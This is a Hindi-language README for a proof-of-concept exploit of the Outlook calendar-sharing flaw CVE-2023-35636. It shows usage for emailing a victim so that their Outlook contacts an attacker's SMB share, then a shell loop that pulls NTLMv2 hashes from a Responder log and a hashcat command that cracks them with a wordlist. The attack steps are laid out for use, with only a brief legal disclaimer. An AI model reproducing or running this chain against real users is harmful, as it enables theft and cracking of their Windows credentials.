
Microsoft Outlook सूचना प्रकटीकरण भेद्यता (पासवर्ड हैश लीक) - Expect Script POC
Microsoft Outlook सूचना प्रकटीकरण भेद्यता (पासवर्ड हैश लीक) - Expect स्क्रिप्ट POC
CVE-2023-35636 Microsoft Outlook में कैलेंडर साझाकरण फ़ंक्शन का शोषण है, जिसमें एक ईमेल में दो हेडर जोड़ने से Outlook सामग्री साझा करने और एक निर्दिष्ट मशीन से संपर्क करने का निर्देश देता है, जिससे NTLM v2 हैश को इंटरसेप्ट करने का अवसर मिलता है।

usage: ./cve-2023-35636.sh mx.fqdn port email_sender email_recipient smb_share
./cve-2023-35636.sh mail.mydomain.com 25 [email protected] [email protected] \\\\x.x.x.x\\mycalendar.ics (dont forget all the \)

नोट्स: chmod +x cve-2023-35636.sh
एप्लिकेशन expect की आवश्यकता है
वैध IP प्रेषक और ईमेल प्रेषक की आवश्यकता है (SPF, DKIM, DMARC पास करने के लिए)


for user in strings Responder-Session.log | grep "NTLMv2-SSP Hash" | cut -d ":" -f 4-6 | sort -u -f | awk '{$1=$1};1'
do
echo "[*] search for: $user";
strings Responder-Session.log | grep "NTLMv2-SSP Hash" | grep -i $user | cut -d ":" -f 4-10 | head -n 1 | awk '{$1=$1};1' >> ntlm-hashes.txt
done
hashcat -a 0 -m 5600 ntlm-hashes.txt rockyou.txt -o cracked.txt -O
श्रेय: https://www.varonis.com/blog/outlook-vulnerability-new-ways-to-leak-ntlm-hashes
वर्कअराउंड/फिक्स: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35636
मेरे बारे में और जानें ;) https://www.linkedin.com/in/duy-huan-bui/
⚠️ अस्वीकरण: महत्वपूर्ण: यह स्क्रिप्ट केवल शैक्षिक, नैतिक परीक्षण और कानूनी उपयोग के लिए प्रदान की गई है। बिना स्पष्ट अनुमति के किसी भी सिस्टम या नेटवर्क पर इसका उपयोग न करें। कंप्यूटर सिस्टम और नेटवर्क तक अनधिकृत पहुंच अवैध है, और अनधिकृत गतिविधियों में पकड़े गए उपयोगकर्ता कानूनी कार्रवाई के अधीन हैं। लेखक इस स्क्रिप्ट के दुरुपयोग से होने वाली किसी भी क्षति के लिए जिम्मेदार नहीं है।